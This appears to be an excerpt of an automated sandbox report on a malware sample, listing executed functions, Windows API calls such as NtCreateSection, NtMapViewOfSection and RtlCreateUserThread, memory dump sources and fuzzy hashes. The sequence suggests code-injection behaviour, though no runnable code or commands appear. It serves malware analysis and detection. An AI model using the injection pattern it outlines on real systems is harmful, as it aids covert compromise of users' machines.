Snapshot File: hcaresult_0_2_2fc0000_mGFoU1INUk.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 62bbbbe301047a0cc95ae73cb333040dad8261c8d9955c9f34ed1e45f27ca6e3
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 3A01F772A10601CFDF21CF20C904BAA33E9EB85245F1540ACD60797241EB70A8428B90

Function 004159F0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00415A21
WritePrivateProfileStringA.KERNEL32(00417384,0041735C,00417330,0041730C), ref: 00415A45
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415A4D
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415A8D
GetComputerNameW.KERNEL32(?,?), ref: 00415AA1
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415AAF
OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 00415ABE
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415ACF

Strings

-, xrefs: 00415ADC

Memory Dump Source

Source File: 00000000.00000002.2143598298.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_mGFoU1INUk.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: db8dc46efc40b99fabcfa4c7d1f5ac96ecf50084b678cb0d3d0fd53c861d6c22
Instruction ID: 2c7d7bcc96ebfa56bd727007de7ac8ab34d93c8d3fedf15d4148c8bbf7674042
Opcode Fuzzy Hash: db8dc46efc40b99fabcfa4c7d1f5ac96ecf50084b678cb0d3d0fd53c861d6c22
Instruction Fuzzy Hash: 4321F731A84308EAD720DF94DC85BD97B70EF4C752F1181AAFA49AA1C0CAB45AC4CB59

Function 00415B10 Relevance: 6.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415B44
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415B5F
HeapDestroy.KERNEL32(00000000), ref: 00415B7E
GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415B86

Memory Dump Source

Source File: 00000000.00000002.2143598298.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_mGFoU1INUk.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
String ID:
API String ID: 367530164-0
Opcode ID: 2eaa3619de8731856ba23563b2baea9085cebb685e66d531b2d230375b233c37
Instruction ID: f8d66b9204655c3a429d25ec7d87b798a9bd44671bb4d674f784994b3474509b
Opcode Fuzzy Hash: 2eaa3619de8731856ba23563b2baea9085cebb685e66d531b2d230375b233c37
Instruction Fuzzy Hash: FF012670A82504DBE750EBB4EC85BDA7BA8F70C306F804037F60A97280DE346C54CB9A

Analysis Process: ibjguehPID: 5960, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	30.2%
Signature Coverage:	0%
Total number of Nodes:	162
Total number of Limit Nodes:	6

Executed Functions

Function 00415BA0 Relevance: 44.0, APIs: 23, Strings: 2, Instructions: 283
filelibrarypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415C72
ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 00415C8B
FindAtomW.KERNEL32(00000000), ref: 00415C92
SetConsoleMode.KERNEL32(00000000,00000000), ref: 00415C9A
SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415CB2
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00415CD9
MoveFileW.KERNEL32(00000000,00000000), ref: 00415CE1
GetVersionExW.KERNEL32(?), ref: 00415CEE
DisconnectNamedPipe.KERNEL32(?), ref: 00415D01
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415D46
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415D55
LCMapStringA.KERNEL32(00000000,00000000,004173C0,00000000,?,00000000), ref: 00415D6B
PulseEvent.KERNEL32(00000000), ref: 00415D7B
SetCommState.KERNELBASE(00000000,00000000), ref: 00415DA4
GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00415DD5
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415DE6
BuildCommDCBA.KERNEL32(00000000,00000000), ref: 00415DEE
GetTimeFormatW.KERNEL32(00000000,00000000,?,004173EC,?,00000000), ref: 00415E2E
GetFileAttributesA.KERNEL32(00000000), ref: 00415E35
GetConsoleAliasExesLengthA.KERNEL32 ref: 00415E3B
GetBinaryType.KERNEL32(0041742C,?), ref: 00415E4D
LoadLibraryA.KERNELBASE(00417438), ref: 00415ED2

Strings

}$, xrefs: 00415F27
k`, xrefs: 00415F03

Memory Dump Source

Source File: 00000004.00000002.2418488030.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_ibjgueh.jbxd

Similarity

API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedLibraryLoadModeModuleMoveNameNamedOutputPathPipePulseSearchStateTimeVersion
String ID: k`$}$
API String ID: 2545807588-956986773
Opcode ID: 89f702b1397d06244922e5fd887acc024e0239ca569067a159a5991e14586c5a
Instruction ID: af97c55d7550fca7481f4020956f7819bfbd285186e11878fc050d44ae633f67
Opcode Fuzzy Hash: 89f702b1397d06244922e5fd887acc024e0239ca569067a159a5991e14586c5a
Instruction Fuzzy Hash: 9CA1E371802A24DBC720DB65EC48ADB7F79FF89351F41406AF50AA7150DB385A81CFAD

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030CB
NtTerminateProcess.NTDLL ref: 004030E4

Memory Dump Source

Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

Function 02CC003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02CC024D

Strings

cess, xrefs: 02CC018D
kernel32.dll, xrefs: 02CC008F, 02CC0095

Memory Dump Source

Source File: 00000004.00000002.2419877592.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_ibjgueh.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: eb4fb2c8579feb1d98d09637ed203926217431dc0c01c4b43d6d7397d26ae795
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 83526974A01229DFDB64CF58C984BACBBB1BF09304F1480E9E94DAB351DB30AA95DF14

Function 00415820 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(02B18CE8), ref: 004158FF
GetProcAddress.KERNEL32(00000000,0041ACD0), ref: 0041593C
VirtualProtect.KERNELBASE(02B18B2C,02B18CE4,00000040,?), ref: 0041595B

Strings

, xrefs: 00415865

Memory Dump Source

Source File: 00000004.00000002.2418488030.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_ibjgueh.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-3916222277
Opcode ID: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
Instruction ID: 391a96fec73ca33ccc7d485fbd88f315141c0e441e0fac2c4929083d5726926d
Opcode Fuzzy Hash: 84852efa8c03839483d38d8860323c66b107fbe912840dfdb41af03374aacfca
Instruction Fuzzy Hash: 64311C20A5B680CBF301CB78F8047923A62BB25744F44857895498B3A5EBBA5534E7EF

Function 02D0AA0F Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02D0AA37
Module32First.KERNEL32(00000000,00000224), ref: 02D0AA57

Memory Dump Source

Source File: 00000004.00000002.2420034001.0000000002D07000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D07000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d07000_ibjgueh.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 2158e3f5a6ce4604574b55cb3f293181632023f1942b7de7927921e47012880b
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 21F090326007116FD7207BFAA9CDB6EB6E8AF49724F101528F742922D0EB70ED458A61

Function 02CC0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02CC0223,?,?), ref: 02CC0E19
SetErrorMode.KERNELBASE(00000000,?,?,02CC0223,?,?), ref: 02CC0E1E

Memory Dump Source

Source File: 00000004.00000002.2419877592.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2cc0000_ibjgueh.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 59145803a341f42eb765d6959b20131ad0ef228589562980b91258829723d85c
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 72D01231145128B7D7003A94DC09BCD7B1CDF05B66F108011FB0DD9080C770964046E5

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02D0A6CE Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02D0A71F

Memory Dump Source

Source File: 00000004.00000002.2420034001.0000000002D07000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D07000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d07000_ibjgueh.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: e8068d03151aef2c62727455b33883587b83a8a1733a9c685cffc8b139f8f3f1
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 19112B79A00208EFDB01DF98C985E98BBF5EF08350F158094FA489B362D771EA50DF90

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000004.00000002.2418464031.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_ibjgueh.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 004157F0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B18CE4,00415E8B), ref: 004157F8

Memory Dump Source

Source File: 00000004.00000002.2418488030.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_ibjgueh.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
Instruction ID: 1a08001e757156177e4176ef5c7bf10d863cb70e7c1df62a2ddb33f564a894ee
Opcode Fuzzy Hash: 74057e30488fa2548e774f69ad24f16fb778dc8554d8f99b62281b18be0c0aab
Instruction Fuzzy Hash: 53B092B09822009BE240CBA0A844B513A68B308342F414421F508C6180DA2054208F14

Non-executed Functions

Function 004159F0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 00415A21
WritePrivateProfileStringA.KERNEL32(00417384,0041735C,00417330,0041730C), ref: 00415A45
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415A4D
GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415A8D
GetComputerNameW.KERNEL32(?,?), ref: 00415AA1
SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415AAF
OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 00415ABE
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415ACF

Strings

-, xrefs: 00415ADC

Memory Dump Source

Source File: 00000004.00000002.2418488030.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_ibjgueh.jbxd

Similarity

API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 113859268-2547889144
Opcode ID: db8dc46efc40b99fabcfa4c7d1f5ac96ecf50084b678cb0d3d0fd53c861d6c22
Instruction ID: 2c7d7bcc96ebfa56bd727007de7ac8ab34d93c8d3fedf15d4148c8bbf7674042
